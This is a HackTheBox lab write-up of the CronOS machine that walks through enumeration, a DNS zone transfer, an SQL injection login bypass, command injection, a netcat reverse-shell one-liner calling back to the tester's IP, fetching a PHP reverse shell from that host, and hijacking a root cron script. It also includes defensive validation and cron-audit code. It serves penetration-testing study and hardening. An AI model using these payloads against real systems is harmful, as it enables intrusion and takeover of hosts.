Another OSCP-like Box: CronOS
This is my third writeup in the OSCP-like Boxes series.
CronOS, a HackTheBox machine at 10.10.10.13, is a Linux box that aims to help aspiring penetration testers practice enumeration, SQL and command injection, and the exploitation of weak permissions on a cron job.
Scanning and Enumeration
I normally start my enumeration with Nmap.
sudo nmap -T5 -n -vvv -oA initial-scan 10.10.10.13
- -T5 is the fastest timing template. The default is -T3
- -n disables name resolution
- -vvv increases the verbosity of the output
- -oA saves the output in all three file formats
Next, I performed a targeted scan on the open TCP ports, using the default NSE scripts, version detection and OS detection.
sudo nmap -sC -sV -O -p22,53,80 -oA targeted-scan 10.10.10.13
All TCP Port Scan
To confirm all open TCP ports, I used Masscan. Alternatively, Nmap's -p- option does the same job.
sudo masscan -e tun0 -p1-65535 --interactive 10.10.10.13
UDP Scan
It’s a best practice to scan the UDP ports as well. I started with the common ports, since a full UDP scan takes a long time to finish.
sudo nmap -sU -sC --top-ports 20 -oA udp-top20 10.10.10.13
Based on my scans, I found that TCP ports 22, 80, and 53 are open.
Port 22
I continued my enumeration and possible exploitation on port 22. Based on Figure 1.1, this is running OpenSSH 7.2p2. There are no major vulnerabilities for this version. Generally, I don't see any major vulnerability in SSH unless it's a very old version.
Port 80
I also browsed the web server, and it appeared to be running the default configuration.
Nikto
I ran Nikto to enumerate the web server, hoping to find anything useful.
nikto -h 10.10.10.13
Gobuster
I also used Gobuster to look for any exposed directories on the web server.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.13
Port 53
Nslookup
Since I didn't get any meaningful information on the web server, I then enumerated the DNS server.
nslookup 10.10.10.13 10.10.10.13
In this non-interactive Nslookup command, the first argument is the name or IP address of the host to be looked up, while the second argument specifies the host name or address of the name server to query.
Based on the Nslookup output, I found the cronos.htb domain name.
Exploitation
Since the DNS server was also listening on TCP, I then attempted a DNS zone transfer using Dig.
dig axfr @10.10.10.13 cronos.htb
I found additional hosts such as admin.cronos.htb. I then added cronos.htb, admin.cronos.htb and ns1.cronos.htb to the /etc/hosts file on my Kali machine.
sudo nano /etc/hosts
SQL Injection
I checked admin.cronos.htb in a browser and noticed that it’s an authentication page. Common usernames and passwords did not work for this page.
I then tested the fields for SQL injection. I used this link for reference. I entered the common SQL injection payload below in both the username and the password fields, with a trailing space after "--".
' OR '1'='1' --
I was able to bypass the authentication page and found a basic application that performs Traceroute and Ping commands.
I then tested whether I could perform command injection in this application. This link is a good reference for command injection attacks.
Based on the output, I was able to perform command injection using the "|" character.
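The root cause of the injection above is user input reaching a shell string. As an added example (not the box's PHP code), the following compares that pattern with a hardened version that allow-lists the target as an IP address or hostname and passes an argv list, never a shell command; the hostname regex and function names are my own.

```python
import ipaddress
import re
import subprocess

# RFC 1123 style hostname: dot-separated labels of letters, digits and
# hyphens, no leading or trailing hyphen, so no shell metacharacters fit.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.IGNORECASE)

def build_ping_vulnerable(target: str) -> str:
    # What the injectable page effectively does: one string handed to
    # /bin/sh, so a "|" in target ends the ping command and starts another.
    return "ping -c 1 " + target

def validate_target(target: str) -> str:
    """Allow-list check: accept only an IP address or a plain DNS hostname."""
    target = target.strip()
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("target is not an IP address or hostname: %r" % target)

def is_valid_target(target: str) -> bool:
    try:
        validate_target(target)
        return True
    except ValueError:
        return False

def build_ping_safe(target: str) -> list[str]:
    # argv list, never a shell string: even if validation were looser,
    # "|", ";" and "$( )" would reach ping as literal bytes, not syntax.
    return ["ping", "-c", "1", validate_target(target)]

def run_ping(target: str) -> str:
    """Run the hardened ping and return its output (needs a ping binary)."""
    proc = subprocess.run(build_ping_safe(target), shell=False,
                          capture_output=True, text=True, timeout=15)
    return proc.stdout + proc.stderr
```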
Reverse Shell
I then tried several reverse shell one-liners. I had success with the one-liner from this GitHub link.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f
Listener
I ran a Netcat listener on port 4444.
sudo nc -nlvp 4444
I then had a non-interactive reverse shell of CronOS.
Post Exploitation
I upgraded my access to an interactive shell. Please refer to this link on how to upgrade your shell.
A good tool to use for privilege escalation is Linux Smart Enumeration by Diego Blanco. It can be downloaded from this GitHub link.
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
Host the file using SimpleHTTPServer
sudo python -m SimpleHTTPServer 80
I then changed to a directory where I had write permission and downloaded the tool using Wget.
cd /dev/shm
wget http://10.10.14.4/lse.sh
I ran the script using the following syntax.
bash lse.sh -i -l 1
Looking at the tool output, I noticed a Cron job that is not part of a default Linux install. I checked the permissions of the script and found that the root user created this Cron job, but the file itself is owned by www-data. Since www-data has full permission on /var/www/laravel/artisan, I simply replaced it with a reverse shell and got root access when the Cron job ran.
ls -l /var/www/laravel/artisan
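The misconfiguration found above, a root cron job whose script a lower-privileged user can overwrite, is easy to audit for. This added example (not from the writeup) parses /etc/crontab-style lines and flags any file referenced by a root job that is not owned by root or is group/world writable; demo() reproduces the finding against a constructed crontab and temp file instead of the real system.

```python
import os
import stat
import tempfile

def parse_system_crontab(text: str) -> list[tuple[str, str]]:
    """Return (user, command) pairs from /etc/crontab-style lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value assignment
        fields = line.split(None, 6)  # 5 time fields, user, command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs

def weak_root_jobs(crontab_text: str) -> list[str]:
    """Flag files referenced by root's jobs that a non-root user could edit."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for tok in command.split():
            path = tok.rstrip(";")
            if not path.startswith("/") or not os.path.isfile(path):
                continue  # skip options, redirects, directories, /dev/null
            st = os.stat(path)
            reasons = []
            if st.st_uid != 0:
                reasons.append("owned by uid %d, not root" % st.st_uid)
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("group/world writable (%04o)" % (st.st_mode & 0o7777))
            if reasons:
                findings.append("%s: %s" % (path, "; ".join(reasons)))
    return findings

def demo() -> list[str]:
    """Constructed reproduction of the CronOS finding in a temp directory."""
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, "artisan")  # stands in for /var/www/laravel/artisan
    with open(script, "w") as fh:
        fh.write("#!/usr/bin/env php\n<?php // stand-in for Laravel's artisan\n")
    os.chmod(script, 0o777)  # the weak permission the writeup exploited
    crontab = ("SHELL=/bin/sh\n# m h dom mon dow user command\n"
               "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
               "* * * * * root php %s schedule:run >> /dev/null 2>&1\n" % script)
    return weak_root_jobs(crontab)
```

On a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d; the same check belongs in a configuration baseline so a write-enabled script under a web root is caught before a cron run executes it.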
I looked for a PHP reverse shell script in Kali, edited the IP in the script to the IP of my Kali machine and overwrote the Cron job file.
locate php-reverse-shell
cp /usr/share/laudanum/php/php-reverse-shell.php .
nano php-reverse-shell.php
I changed the IP in the script to 10.10.14.4, the IP of my Kali.
Host the file using SimpleHTTPServer and transfer it to CronOS.
python -m SimpleHTTPServer
wget http://10.10.14.4/php-reverse-shell.php
Listener
I set up another Netcat listener on port 8888, then copied php-reverse-shell.php to /var/www/laravel/artisan.
nc -nlvp 8888
cp php-reverse-shell.php /var/www/laravel/artisan
Root access!
Flags
Key Takeaways
- Limit the information the DNS server provides; disable DNS zone transfers to untrusted servers.
- Follow a secure SDLC when creating applications.
- Apply appropriate patches and mitigations against injection attacks.
- Implement proper file permissions.